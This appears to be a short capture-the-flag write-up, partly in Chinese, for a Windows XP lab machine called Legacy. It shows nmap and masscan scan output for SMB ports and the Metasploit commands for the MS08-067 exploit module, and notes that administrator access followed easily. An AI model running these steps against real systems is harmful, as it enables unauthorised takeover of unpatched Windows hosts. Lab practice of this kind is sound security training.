ms08-067

10.10.10.4

masscan + nmap

1
2
3
Discovered open port 139/tcp on 10.10.10.4                                     
Discovered open port 137/udp on 10.10.10.4                                     
Discovered open port 445/tcp on 10.10.10.4                                     

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
PORT    STATE    SERVICE      VERSION
137/tcp filtered netbios-ns
139/tcp open     netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open     microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: -4h04m52s, deviation: 1h24m49s, median: -5h04m51s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:a4:e1:e1 (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2019-01-29T11:51:37+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 264.20 seconds
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 21:00 +08
Nmap scan report for 10.10.10.4
Host is up (0.32s latency).

PORT    STATE         SERVICE      VERSION
137/udp open          netbios-ns   Microsoft Windows netbios-ns (workgroup: HTB)
139/udp open|filtered netbios-ssn
445/udp open|filtered microsoft-ds
Service Info: Host: LEGACY; OS: Windows; CPE: cpe:/o:microsoft:windows

nessus

1

metasploit

1
2
3
msfconsole
search ms08-067
use exploit/windows/smb/ms08_067_netapi

总结

和永恒之蓝类似

很简单的得到了administrator权限。